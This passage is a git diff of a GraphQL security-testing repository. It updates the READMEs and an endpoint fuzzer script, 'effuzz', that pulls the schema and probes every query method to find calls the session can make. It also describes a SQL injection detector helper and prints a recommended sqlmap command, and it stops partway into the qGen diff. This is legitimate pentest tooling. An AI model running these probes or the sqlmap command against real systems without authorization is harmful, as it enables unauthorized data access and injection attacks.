diff --git a/README.md b/README.md index 91d8457..47ed220 100644 --- a/README.md +++ b/README.md @@ -1,37 +1,87 @@ # GraphQL-Scripts -This repository contains a series of useful scripts for pentesting GraphQL endpoints. +This repository contains a set of small utilities to help with security testing and exploration of GraphQL endpoints. -## Basic Information +Included tools +- qGen — interactive Query Generator: lists schema methods and generates full GraphQL queries (selection sets) for a chosen method. +- effuzz — Endpoint Fuzzer: enumerates query/mutation names from a schema and performs lightweight requests to identify methods you can call (ffuf-like for GraphQL). +- sqli — SQLi Detector helper: probes string arguments for SQL injection indicators and writes sqlmap marker files for reproducible testing. -This repository contains two scripts: [qGen.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/qGen) and [effuzz.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/effuzz). -- `qGen.py` allows you to list all the methods available in your GraphQL schema and then generate a query to dump all possible information with a method (like `findAllUsers`). -- `effuzz.py` allows you to check permissions in all the methods of your GraphQL schema (similar output to `ffuf`). +Quick notes +- Tools accept an introspection JSON file via `--introspection`. +- If `--introspection` is omitted, `qGen` and `effuzz` can fetch the schema automatically from `--url` (requires the `requests` package). Automatic introspection is saved by default to `introspection_schema.json` (disable with `--no-save-introspection`). +- Use these tools only on systems for which you have explicit authorization. -## Methodology to use +Requirements +- Python 3.7+ +- For automatic introspection / HTTP requests: pip install requests ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json` - -- You can first run `effuzz.py` to check for interesting methods allowed for your session: +Basic workflow (recommended) +1. Use `effuzz` to quickly determine which methods the current session can call (permission discovery). +2. Use `qGen` to generate a full query for an interesting method and paste the result into your GraphQL client (Burp, Postman, GraphiQL, etc.). +3. Optionally use the `sqli` helper to target string arguments for SQLi checks and produce sqlmap marker files. +effuzz — quick example +- Run with a saved introspection file: ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql +python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql +``` -[redacted] -getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1] -getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] #<----- This indicates a malformed query, so you have permissions for this one -getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] #<----- You also have permissions for this one +- Example (sanitized) sample output: +```text +[✓] Introspection loaded (120 queries, 8 mutations) +------------------------------------------------------------ +getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1] +getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] # malformed query -> server accepted request (likely allowed) +getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] # likely accessible +------------------------------------------------------------ +(Use --debug to dump full responses) ``` - -- Once you obtained those methods which might interest you, you can run `qGen.py` and generate a query for that method: +What to infer from effuzz output +- 401 / 403: authentication/authorization required. +- 400: GraphQL often returns 400 for malformed queries; if the server returns 400 rather than 401, it usually indicates your request reached the server (the method exists and you may have permission). +- 200: successful request — inspect the body for `data` or `errors`. + +qGen — quick example +- Run with a saved introspection file: ```shell -python3 qGen.py --introspection /path/to/introspection_schema.json +python3 qGen/qGen.py --introspection /path/to/introspection_schema.json +``` + +- Interactive session (sanitized): +```text +qGen $ listMethods + [1] getAllUsers + [2] getUserById -[redacted] qGen $ use getAllUsers -qGen $ genQuery +# The full query is printed and saved to queries/getAllUsers.txt +``` + +Notes about qGen +- The `use` command selects a method and immediately generates & saves the full query (no separate `genQuery` step). +- Generated queries are saved in the `queries/` directory. + +sqli helper — quick example +- Install requirements (if provided) or at minimum: +```bash +pip install requests +``` + +- Run (headers passed as JSON string is one supported way; consult script help for options): +```bash +python3 sqli/sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}' +``` + +- Sample (sanitized) output: +```text +VULNERABLE PARAMETER: username (field: user) +Evidence: Baseline != Attack (baseline {"data": {"user": null}}, attack {"data": {"user": {"uuid": "1"}}}) +Recommended sqlmap command: +sqlmap -r 'repro-payloads/user_username___marker.http' -p "JSON[query]" --batch --skip-urlencode --parse-errors --random-agent ``` -- Now you can copy the query generated and paste it into BurpSuite, PostMan or GraphiQL. +Security & ethics +- These tools actively probe targets; run them only on systems you are authorized to test. +- Inspect any generated marker files before running sqlmap or other automated tooling. diff --git a/effuzz/README.md b/effuzz/README.md index 692c7aa..16dc965 100644 --- a/effuzz/README.md +++ b/effuzz/README.md @@ -1,6 +1,7 @@ -# Endpoint Fuzzer +```markdown +# Endpoint Fuzzer (effuzz) -This script helps you check for methods you've got permissions in your GraphQL schema. +This script helps you detect which GraphQL methods you may be able to call (or have permissions for) by enumerating Query/Mutation names from an introspection schema and performing lightweight checks. ```shell ███████╗███████╗███████╗██╗ ██╗███████╗███████╗ @@ -8,55 +9,127 @@ This script helps you check for methods you've got permissions in your GraphQL s █████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ ██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ ███████╗██║ ██║ ╚██████╔╝███████╗███████╗ -╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ +╚══════╝╚═╝ ╚═╝ ╚═════╝╚══════╝╚══════╝ ``` +## Overview + +effuzz enumerates available fields from a GraphQL schema and issues minimal GraphQL requests for each method to learn how the server responds. It is useful to quickly spot methods that accept requests (status 200/400) versus those that deny access (401/403) or cause other errors. + +Two modes: +- Explicit introspection: supply a previously saved introspection JSON with `--introspection`. +- Automatic introspection: omit `--introspection` and provide `--url`; effuzz will attempt to fetch the schema from the endpoint (requires the `requests` library). By default the fetched introspection is saved to `introspection_schema.json` (toggle with `--no-save-introspection`). + +Note: Use these tools only on targets you are authorized to test. + +## Requirements + +- Python 3.7+ +- requests (only required for automatic introspection / HTTP requests): + pip install requests + ## Usage ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`. +Important: either provide a local introspection JSON or let effuzz fetch it automatically from the target with `--url`. -- Basic command: +- Using a saved introspection file (explicit mode): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql +python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql ``` -- If you have cookie and/or variables to anidate queries: +- Automatic introspection (effuzz fetches the schema from the endpoint): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --cookie /path/to/cookie.txt --variables /path/to/variables.json +python3 effuzz/effuzz.py --url https://example.com/graphql \ + -H "Authorization: Bearer TOKEN" \ + --cookie /path/to/cookie.txt ``` -- Enable debug mode to check petitions and responses: +- With variables file and cookie: ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --debug +python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json \ + --url https://example.com/graphql \ + --cookie /path/to/cookie.txt \ + --variables /path/to/variables.json ``` -- Match exact reponse status codes: +- Enable debug to inspect request and response bodies: ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --mc 200,403 +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql --debug ``` -- Hide responses with matching status codes: +- Match specific response status codes (show only these): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --fc 200,403 +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql --match-code 200,403 ``` -## Available commands - -- You can use the following commands: +- Filter out specific status codes (hide these): ```shell - --introspection Path to the introspection JSON file - --url GraphQL endpoint URL - -s | --silent Only show endpoints that DO NOT return 401 - --cookie File containing cookie in plain text (one line) - --variables JSON file with variables for the payload - --debug Show full request and response - --match-code | -mc Show only responses with matching status codes (e.g., 200,403,500) - --filter-code | -fc Hide responses with matching status codes (e.g., 401,404) +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql --filter-code 401,404 +``` + +## Important options + +```text +--introspection Path to the introspection JSON file (optional if --url is used) +--url GraphQL endpoint URL (required for automatic introspection) +-H, --header Add HTTP header(s) for requests; repeatable. Format: "Name: Value" +-s, --silent Hide responses that return 401 +--cookie File containing cookie value (one line); ignored if Cookie provided via -H +--variables JSON file with variables to include in requests +--debug Print full request and response bodies (helps troubleshooting) +--match-code, -mc Show only responses with these status codes (comma separated) +--filter-code, -fc Hide responses that match these status codes (comma separated) +--save-introspection Save automatic introspection to introspection_schema.json (default) +--no-save-introspection Do not save automatic introspection to disk ``` + +## Example output + +A short sample run (values and counts are illustrative): + +```text +$ python3 effuzz/effuzz.py --introspection introspection_schema.json --url http://94.237.63.174:57732/graphql + +[✓] Introspection loaded (120 queries, 8 mutations) +------------------------------------------------------------ +getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1] +getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] # malformed query -> server accepted request +getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] # likely accessible +findUserByEmail [Status: 200] [Size: 512] [Words: 80] [Lines: 3] # returns data +------------------------------------------------------------ +(Use --debug to dump full responses) +``` + +Notes on interpreting results: +- 401 / 403: usually indicates authentication/authorization required. +- 400: GraphQL servers commonly return 400 for syntactically invalid or semantically wrong queries – this can still mean the method exists and the server processed the request. +- 200: successful request; check response body for `data` or `errors` to decide further steps. + +## Troubleshooting + +- Automatic introspection fails: + - Ensure `--url` points to the GraphQL endpoint. + - Provide proper auth headers with `-H "Authorization: Bearer ..."` or use `--cookie`. + - Check that the server accepts the introspection query (some servers disable it). + - If the endpoint returns non-JSON or a wrapper format, effuzz may not detect `__schema`. + +- Requests fail with network errors: + - Try increasing timeout in the code or check network connectivity/proxy settings. + +- Too many fields / huge schema: + - Consider filtering or generating smaller payloads when using the `--variables` option or modifying the request loop. + +## Security & ethics + +Only run effuzz on systems you are authorized to test. These tools are intended for legitimate security testing and research. + +## Further reading / next steps + +- Use qGen to generate full queries for interesting methods discovered by effuzz. +- Use the sqli helper to target string arguments found in introspection for simple SQLi checks. diff --git a/effuzz/effuzz.py b/effuzz/effuzz.py index ee31dd1..ccf5de1 100644 --- a/effuzz/effuzz.py +++ b/effuzz/effuzz.py @@ -1,251 +1,366 @@ #!/usr/bin/env python3 +""" +effuzz.py - GraphQL endpoint fuzzer + +Comportamiento principal: +- Si se pasa --introspection /ruta/to/file.json, carga ese JSON (valida). +- Si no se pasa --introspection, realiza automáticamente la consulta de introspección + al endpoint definido por --url usando las cabeceras (-H/--header) y --cookie si se proporcionan. + Por defecto guarda la introspección en introspection_schema.json (puedes desactivar con --no-save-introspection). +- Extrae queries y mutations del esquema y realiza una comprobación básica tipo ffuf (envía peticiones y muestra status/size/words/lines). +- Mantiene opciones: --variables (JSON), --debug, --match-code, --filter-code, -s/--silent. +""" + +import os +import sys import json -import requests import argparse -import sys -import os - -# ===================================================== -# COLORS -# ===================================================== -RED = "\033[91m" -YELLOW = "\033[93m" -MAGENTA = "\033[95m" -GREEN = "\033[92m" -CYAN = "\033[36m" +import textwrap +from typing import Dict, Any, List, Optional + +# Intentar importar requests, indicar al usuario si falta +try: + import requests +except Exception: + requests = None + +# ANSI colors +RED = "\033[31m" +GREEN = "\033[32m" +YELLOW = "\033[33m" +BLUE = "\033[34m" RESET = "\033[0m" - + def print_banner(): - print(f""" -{YELLOW} -███████╗███████╗███████╗██╗ ██╗███████╗███████╗ -██╔════╝██╔════╝██╔════╝██║ ██║╚══███╔╝╚══███╔╝ -█████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ -██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ -███████╗██║ ██║ ╚██████╔╝███████╗███████╗ -╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ - v1.0 -{RESET} - -{CYAN}made by gitblanc — https://github.com/gitblanc/GraphQL-Scripts{RESET} - -""") - -# ===================================================== -# CLI ARGUMENTS -# ===================================================== -parser = argparse.ArgumentParser(description="Test GraphQL endpoints using introspection.") -parser.add_argument("--introspection", required=True, help="Path to the introspection JSON file") -parser.add_argument("--url", required=True, help="GraphQL endpoint URL") - -parser.add_argument("-s", "--silent", action="store_true", - help="Only show endpoints that DO NOT return 401") - -parser.add_argument("--cookie", help="File containing cookie in plain text (one line)") -parser.add_argument("--variables", help="JSON file with variables for the payload") -parser.add_argument("--debug", action="store_true", help="Show full request and response") -parser.add_argument("--match-code", "-mc", - help="Show only responses with matching status codes (e.g., 200,403,500)") -parser.add_argument("--filter-code", "-fc", - help="Hide responses with matching status codes (e.g., 401,404)") - -args = parser.parse_args() - -GRAPHQL_URL = args.url -INTROSPECTION_FILE = args.introspection - -# Parse match-code -match_codes = None -if args.match_code: - match_codes = set(int(x.strip()) for x in args.match_code.split(",") if x.strip().isdigit()) - -# Parse filter-code -filter_codes = None -if args.filter_code: - filter_codes = set(int(x.strip()) for x in args.filter_code.split(",") if x.strip().isdigit()) - -print_banner() - -# ===================================================== -# VALIDATE FILE -# ===================================================== -if not os.path.exists(INTROSPECTION_FILE): - print(f"❌ File not found: {INTROSPECTION_FILE}") - sys.exit(1) - -try: - with open(INTROSPECTION_FILE, "r") as f: - introspection_data = json.load(f) -except json.JSONDecodeError: - print("❌ The introspection file is NOT valid JSON.") - sys.exit(1) - -# ===================================================== -# LOAD COOKIE AND VARIABLES -# ===================================================== -cookie_value = None -if args.cookie: - if not os.path.exists(args.cookie): - print(f"❌ Cookie file not found: {args.cookie}") - sys.exit(1) - with open(args.cookie, "r") as f: - cookie_value = f.read().strip() - -variables_value = {} -if args.variables: - if not os.path.exists(args.variables): - print(f"❌ Variables file not found: {args.variables}") - sys.exit(1) - try: - with open(args.variables, "r") as f: - variables_value = json.load(f) - except: - print("❌ Variables file is NOT valid JSON.") - sys.exit(1) - -# ===================================================== -# EXTRACT QUERIES / MUTATIONS FROM THE SCHEMA -# ===================================================== -if "data" not in introspection_data: - print("❌ JSON does not contain 'data' key. Not valid introspection.") - sys.exit(1) - -schema = introspection_data["data"].get("__schema", {}) -types = schema.get("types", []) - -def get_fields(type_name): - for t in types: - if t.get("name") == type_name: - return [f["name"] for f in t.get("fields", [])] - return [] - -query_type_name = schema.get("queryType", {}).get("name") -mutation_type_name = schema.get("mutationType", {}).get("name") - -queries = get_fields(query_type_name) if query_type_name else [] -mutations = get_fields(mutation_type_name) if mutation_type_name else [] - -print(f"[✓] Introspection loaded ({len(queries)} queries, {len(mutations)} mutations)") -print("------------------------------------------------------------") - -# ===================================================== -# HEADERS (With or without authentication) -# ===================================================== -HEADERS = { - "Content-Type": "application/json" + print(textwrap.dedent(f""" + {YELLOW} + ███████╗███████╗███████╗██╗ ██╗███████╗███████╗ + ██╔════╝██╔════╝██╔════╝██║ ██║╚══███╔╝╚══███╔╝ + █████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ + ██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ + ███████╗██║ ██║ ╚██████╔╝███████╗███████╗ + ╚══════╝╚═╝ ╚═╝ ╚═════╝╚══════╝╚══════╝ + {RESET} + """)) + +# Introspection query (suficientemente completa) +INTROSPECTION_QUERY = """ +query IntrospectionQuery { + __schema { + queryType { name } + mutationType { name } + types { + kind + name + fields(includeDeprecated: true) { + name + args { + name + type { kind name ofType { kind name ofType { kind name } } } + } + type { kind name ofType { kind name } } + } + } + } } - -if cookie_value: - HEADERS["Cookie"] = cookie_value - -# ===================================================== -# FFUF-LIKE PROCESSING -# ===================================================== -def response_stats(resp): - text = resp.text +""" + +def parse_header_list(headers_list: List[str]) -> Dict[str, str]: + """ + Convierte una lista de 'Name: Value' a dict. Última gana en duplicados. + """ + hdrs: Dict[str, str] = {} + for h in headers_list or []: + if ":" not in h: + print(f"⚠️ Ignorando cabecera malformada (esperado 'Name: Value'): {h}") + continue + name, value = h.split(":", 1) + hdrs[name.strip()] = value.strip() + return hdrs + +def perform_introspection_request(url: str, headers: Dict[str, str], timeout: int = 15) -> Optional[Dict[str, Any]]: + """ + Realiza la petición POST con la consulta de introspección. + Devuelve dict JSON si es válida, o None en fallo. + """ + if requests is None: + print("❌ La librería 'requests' es necesaria para obtener introspección automáticamente. Instálala con: pip install requests") + return None + try: + resp = requests.post(url, headers=headers, json={"query": INTROSPECTION_QUERY}, timeout=timeout) + except requests.exceptions.RequestException as e: + print(f"❌ Error HTTP al solicitar introspección: {e}") + return None + + try: + data = resp.json() + except Exception as e: + print(f"❌ La respuesta no es JSON válido: {e}") + return None + + if (isinstance(data, dict) and + ((data.get("data") and isinstance(data["data"], dict) and "__schema" in data["data"]) or ("__schema" in data))): + return data + + print("❌ La respuesta de introspección no contiene '__schema' (no es una introspección GraphQL válida).") + return None + +def save_introspection_file(data: Dict[str, Any], path: str = "introspection_schema.json") -> None: + try: + with open(path, "w", encoding="utf-8") as fh: + json.dump(data, fh, indent=2, ensure_ascii=False) + print(f"✅ Introspection guardada en: {path}") + except Exception as e: + print(f"⚠️ Falló al guardar introspección en {path}: {e}") + +def load_introspection_from_path(path: str) -> Optional[Dict[str, Any]]: + try: + with open(path, "r", encoding="utf-8") as f: + data = json.load(f) + return data + except json.JSONDecodeError: + print(f"❌ El archivo de introspección no es JSON válido: {path}") + return None + except Exception as e: + print(f"❌ Error leyendo {path}: {e}") + return None + +def response_stats(resp: requests.Response) -> (int, int, int): + text = resp.text or "" size = len(text) words = len(text.split()) lines = text.count("\n") + 1 return size, words, lines - -def color_status(code, resp): - """Assign a color according to the real response type.""" - + +def color_status(code: int, resp: requests.Response) -> str: + """ + Devuelve código coloreado acorde al tipo de respuesta. + Heurística ligera que intenta imitar comportamiento original. + """ if code == 200: try: data = resp.json() if "errors" not in data: return f"{GREEN}{code}{RESET}" - except: + except Exception: pass return f"{YELLOW}{code}{RESET}" - + if code in (401, 403) or "Method forbidden" in resp.text: return f"{RED}{code}{RESET}" - + if code in (400, 500): return f"{YELLOW}{code}{RESET}" - + return str(code) - - -def test_endpoint(name, is_mutation=False): - - if is_mutation: - gql = f"mutation {name} {{ {name} }}" - else: - gql = f"query {name} {{ {name} }}" - - body = { - "operationName": name, - "variables": variables_value, - "query": gql - } - + +def build_minimal_query_for_method(method_name: str) -> str: + """ + Construye una query simple para testear el método. + Intentamos la forma: query { methodName } + Si requiere args o selección, el endpoint responderá con error (400) y eso se reportará. + """ + return f"query {{ {method_name} }}" + +def perform_request(url: str, headers: Dict[str, str], payload: Dict[str, Any], timeout: int = 15) -> Optional[requests.Response]: + if requests is None: + print("❌ La librería 'requests' es necesaria para ejecutar effuzz. Instálala con: pip install requests") + return None try: - if args.debug: - print("\n====================== REQUEST ======================") - print("→ Endpoint:", GRAPHQL_URL) - print("→ Headers:", json.dumps(HEADERS, indent=2)) - print("→ Sent body:") - print(json.dumps(body, indent=2)) - resp = requests.post(GRAPHQL_URL, headers=HEADERS, json=body) - if args.debug: - print("\n====================== RESPONSE =====================") - print("← HTTP Status:", resp.status_code) - try: - print(json.dumps(resp.json(), indent=2)) - except: - print(resp.text) - print("=====================================================\n") - except Exception: + resp = requests.post(url, headers=headers, json=payload, timeout=timeout) + return resp + except requests.exceptions.RequestException as e: + print(f"❌ Error en petición a {url}: {e}") return None - - size, words, lines = response_stats(resp) - status_colored = color_status(resp.status_code, resp) - - return { - "status": status_colored, - "status_raw": resp.status_code, - "size": size, - "words": words, - "lines": lines, + +def get_fields_from_schema(schema: Dict[str, Any]) -> (List[str], List[str]): + types = schema.get("types", []) if isinstance(schema, dict) else [] + def get_fields(type_name: str): + if not type_name: + return [] + for t in types: + if t.get("name") == type_name: + return [f["name"] for f in t.get("fields", [])] if t.get("fields") else [] + return [] + query_type_name = schema.get("queryType", {}).get("name") + mutation_type_name = schema.get("mutationType", {}).get("name") + queries = get_fields(query_type_name) + mutations = get_fields(mutation_type_name) + return queries, mutations + +def main(): + print_banner() + + parser = argparse.ArgumentParser(description="Test GraphQL endpoints using introspection.") + # Now introspection is optional: if omitted we will query the endpoint automatically + parser.add_argument("--introspection", required=False, help="Path to the introspection JSON file") + parser.add_argument("--url", required=True, help="GraphQL endpoint URL") + + parser.add_argument("-s", "--silent", action="store_true", + help="Only show endpoints that DO NOT return 401") + + parser.add_argument("--cookie", help="File containing cookie in plain text (one line)") + parser.add_argument("--variables", help="JSON file with variables for the payload") + parser.add_argument("--debug", action="store_true", help="Show full request and response") + parser.add_argument("--match-code", "-mc", + help="Show only responses with matching status codes (e.g., 200,403,500)") + parser.add_argument("--filter-code", "-fc", + help="Hide responses with matching status codes (e.g., 401,404)") + + # Support repeated headers -H "Name: Value" + parser.add_argument("-H", "--header", action="append", default=[], help="Additional HTTP header to include (can be repeated). Format: 'Name: Value'") + + # Control saving of automatic introspection (default: save) + parser.add_argument("--save-introspection", dest="save_introspection", action="store_true", help="Save automatic introspection to introspection_schema.json") + parser.add_argument("--no-save-introspection", dest="save_introspection", action="store_false", help="Do not save automatic introspection to disk") + parser.set_defaults(save_introspection=True) + + args = parser.parse_args() + + GRAPHQL_URL = args.url + INTROSPECTION_FILE = args.introspection + + match_codes = None + if args.match_code: + match_codes = set(int(x.strip()) for x in args.match_code.split(",") if x.strip().isdigit()) + + filter_codes = None + if args.filter_code: + filter_codes = set(int(x.strip()) for x in args.filter_code.split(",") if x.strip().isdigit()) + + # Build headers + extra_headers = parse_header_list(args.header) + HEADERS: Dict[str, str] = { + "Content-Type": "application/json" } - -# ===================================================== -# FFUF-LIKE OUTPUT -# ===================================================== -def print_result(name, r): - if r is None: - return - - status_raw = r["status_raw"] - - if args.silent and status_raw == 401: - return - - if match_codes is not None and status_raw not in match_codes: - return - - if filter_codes is not None and status_raw in filter_codes: - return - - print( - f"{CYAN}{name}{RESET} " - f"[Status: {r['status']}] " - f"[Size: {r['size']}] " - f"[Words: {r['words']}] " - f"[Lines: {r['lines']}] " - ) - -# ========================= QUERIES ========================== -for q in queries: - res = test_endpoint(q) - print_result(q, res) - -# ========================= MUTATIONS ========================== -for m in mutations: - res = test_endpoint(m, is_mutation=True) - print_result(m, res) - -print("\n[✓] Test completed.\n") + + # Cookie file handling: gives precedence to explicit -H Cookie + if args.cookie: + if not os.path.exists(args.cookie): + print(f"❌ Cookie file not found: {args.cookie}") + sys.exit(1) + with open(args.cookie, "r", encoding="utf-8") as f: + cookie_value = f.read().strip() + if "Cookie" not in extra_headers: + extra_headers["Cookie"] = cookie_value + + HEADERS.update(extra_headers) + + # Load variables file if provided + variables_value: Dict[str, Any] = {} + if args.variables: + if not os.path.exists(args.variables): + print(f"❌ Variables file not found: {args.variables}") + sys.exit(1) + try: + with open(args.variables, "r", encoding="utf-8") as f: + variables_value = json.load(f) + except Exception: + print("❌ Variables file is NOT valid JSON.") + sys.exit(1) + + introspection_data: Optional[Dict[str, Any]] = None + + # If user provided a file, load it + if INTROSPECTION_FILE: + if not os.path.exists(INTROSPECTION_FILE): + print(f"❌ File not found: {INTROSPECTION_FILE}") + sys.exit(1) + introspection_data = load_introspection_from_path(INTROSPECTION_FILE) + if introspection_data is None: + sys.exit(1) + print(f"✅ Introspection cargada desde: {INTROSPECTION_FILE}") + else: + # No introspection file provided -> perform introspection automatically + print(f"[*] No se ha pasado --introspection; intentando obtener introspección desde {GRAPHQL_URL} ...") + result = perform_introspection_request(GRAPHQL_URL, HEADERS) + if result is None: + print("❌ No se pudo obtener la introspección del endpoint. Salida.") + sys.exit(1) + introspection_data = result + print("✅ Introspection obtenida del endpoint.") + if args.save_introspection: + save_introspection_file(introspection_data, path="introspection_schema.json") + + # Validate introspection structure + if not isinstance(introspection_data, dict): + print("❌ La introspección cargada no es un objeto JSON válido.") + sys.exit(1) + + # Support both shapes: {"data": {"__schema": ...}} or {"__schema": ...} + schema = None + if "data" in introspection_data and isinstance(introspection_data["data"], dict): + schema = introspection_data["data"].get("__schema", {}) + else: + schema = introspection_data.get("__schema", {}) + + if not isinstance(schema, dict) or not schema: + print("❌ No se encontró '__schema' en la introspección o es inválido.") + sys.exit(1) + + types = schema.get("types", []) + + # Extract queries and mutations + def get_fields(type_name: Optional[str]): + if not type_name: + return [] + for t in types: + if t.get("name") == type_name: + return [f["name"] for f in t.get("fields", [])] if t.get("fields") else [] + return [] + + query_type_name = schema.get("queryType", {}).get("name") + mutation_type_name = schema.get("mutationType", {}).get("name") + + queries = get_fields(query_type_name) if query_type_name else [] + mutations = get_fields(mutation_type_name) if mutation_type_name else [] + + print(f"[✓] Introspection cargada ({len(queries)} queries, {len(mutations)} mutations)") + print("------------------------------------------------------------") + + # ======================================================================== + # Minimal ffuf-like processing: para cada método en queries, enviamos una petición + # y mostramos status/size/words/lines. Este bloque puede ampliarse con payloads, + # control de códigos, filtros, etc. (mantiene la funcionalidad básica del original). + # ======================================================================== + + if not queries: + print("⚠️ No se han encontrado queries para probar.") + else: + print("Probando queries (envío minimal):") + for qname in queries: + payload_query = build_minimal_query_for_method(qname) + payload = {"query": payload_query} + # Si variables globales fueron provistas, intentar incluirlas (aunque la query minimal no las usa) + if variables_value: + payload["variables"] = variables_value + resp = perform_request(GRAPHQL_URL, HEADERS, payload) + if resp is None: + print(f"{qname:30} -> {RED}request failed{RESET}") + continue + code = resp.status_code + size, words, lines = response_stats(resp) + colored = color_status(code, resp) + # Aplica filtros si están presentes + if match_codes and code not in match_codes: + continue + if filter_codes and code in filter_codes: + continue + if args.silent and code == 401: + continue + + print(f"{qname:30} [Status: {colored}] [Size: {size}] [Words: {words}] [Lines: {lines}]") + + if args.debug: + try: + print("---- RESPONSE JSON ----") + print(json.dumps(resp.json(), indent=2, ensure_ascii=False)) + except Exception: + print("---- RESPONSE TEXT ----") + print(resp.text) + + print("------------------------------------------------------------") + print("Fin de effuzz. (Este script hace una comprobación básica; modifica el bucle para incluir payloads, concurrencia u otras heurísticas según necesites.)") + +if __name__ == "__main__": + main() diff --git a/qGen/README.md b/qGen/README.md index bae69d8..020d5af 100644 --- a/qGen/README.md +++ b/qGen/README.md @@ -1,4 +1,5 @@ -# Query Generator +```markdown +# Query Generator (qGen) This script helps you to generate sample queries for enormous GraphQL endpoints. @@ -14,26 +15,38 @@ This script helps you to generate sample queries for enormous GraphQL endpoints. ## Usage >[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`. +>You must either provide a saved introspection JSON file (e.g. `introspection_schema.json`) or allow qGen to fetch introspection automatically from a GraphQL endpoint by supplying `--url`. Automatic introspection requires the `requests` package. -- You must execute the script like this: +- To run with a local introspection file: ```shell python3 qGen.py --introspection /path/to/introspection_schema.json ``` -- Then you'll be prompted with an interactive terminal: +- To run and let qGen obtain the introspection from a live endpoint (automatic mode): + +```shell +python3 qGen.py --url https://example.com/graphql \ + -H "Authorization: Bearer TOKEN" \ + --cookie /path/to/cookie.txt +``` + +Notes: +- Automatic introspection requires the Python package `requests` (install with `pip install requests`). +- When qGen fetches introspection automatically, the result is saved by default to `introspection_schema.json`. Use `--no-save-introspection` to avoid saving the file. + +- After starting, you'll be prompted with an interactive terminal: ```shell qGen $ ``` -### Option 1 +### Option 1 — List and select by index -- You can list all methods and mutations available in your schema and select the one you are interested in: +You can list all methods available in your schema and select the one you want: ```shell -# ------Listing methods and selecting one------ +# ------ Listing methods and selecting one ------ qGen $ listMethods [redacted] @@ -42,25 +55,26 @@ qGen $ listMethods [3] findAllConfigFiles qGen $ use 1 -qGen $ genQuery +# Selecting a method with `use` immediately generates and prints the full query, +# and the query is automatically saved to queries/.txt ``` -### Option 2 +### Option 2 — Select by name -- Directly use one method you know by name: +Directly select a method by its name: ```shell -# ------Directly select one method------ +# ------ Directly select one method ------ qGen $ use findAllConfigFiles -qGen $ genQuery +# The query is generated and saved automatically ``` -### Option 3 +### Option 3 — Filtered listing with grep -- Search for specific methods according to a grep pipe: +You can pipe the output of `listMethods` through a simple grep filter: ```shell -# ------Search for alike methods------ +# ------ Search for similar methods ------ qGen $ listMethods | grep Id [redacted] @@ -69,7 +83,7 @@ qGen $ listMethods | grep Id [89] findAllConfigFilesByContractId qGen $ use 89 -qGen $ genQuery +# The full query for method 89 is generated and saved ``` ## Available commands @@ -79,10 +93,40 @@ qGen $ genQuery ```shell help - Show the help message listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields + use - Select a method (by index or name) and immediately generate & save its full query exit - Exit the application ``` +Notes about behavior and output +- The `use` command now combines selection and query generation: when you `use` a method, qGen prints the complete GraphQL query (including nested selections) and saves it into `queries/.txt`. +- Saved queries are stored in the `queries/` directory (created automatically if missing). +- A typical generated query will include all scalar fields and descend into nested object fields where possible (respecting cycles by avoiding repeated types). + +Example interactive output (sample) +```text +qGen $ use getAllUsers + +---------------------------------------- +query getAllUsers { + getAllUsers { + id + username + email + profile { + id + name + } + } +} +---------------------------------------- + +📁 Query saved to: queries/getAllUsers.txt +``` - +Troubleshooting +- If automatic introspection fails, check: + - That the `--url` is correct and reachable. + - Authentication headers or cookie are correct (`-H "Authorization: Bearer ..."` or `--cookie /path/to/cookie.txt`). + - That the server responds to GraphQL introspection and returns JSON containing `__schema`. +- If you prefer to avoid network fetching, run the introspection query separately (using curl, GraphiQL, or another client), save the JSON, and pass it with `--introspection`. +- If a generated query is too large for your client, consider manually trimming fields or selecting nested fields selectively. diff --git a/qGen/qGen.py b/qGen/qGen.py index 42266e5..bd234d0 100644 --- a/qGen/qGen.py +++ b/qGen/qGen.py @@ -1,8 +1,17 @@ +#!/usr/bin/env python3 import json import os import sys import argparse - +import textwrap +from typing import Dict, Any, List, Optional + +# Try to import requests; if missing, we'll show a helpful message when needed +try: + import requests +except Exception: + requests = None + # ANSI COLORS RED = "\033[31m" GREY = "\033[90m" @@ -10,7 +19,7 @@ YELLOW = "\033[33m" CYAN = "\033[36m" RESET = "\033[0m" - + def 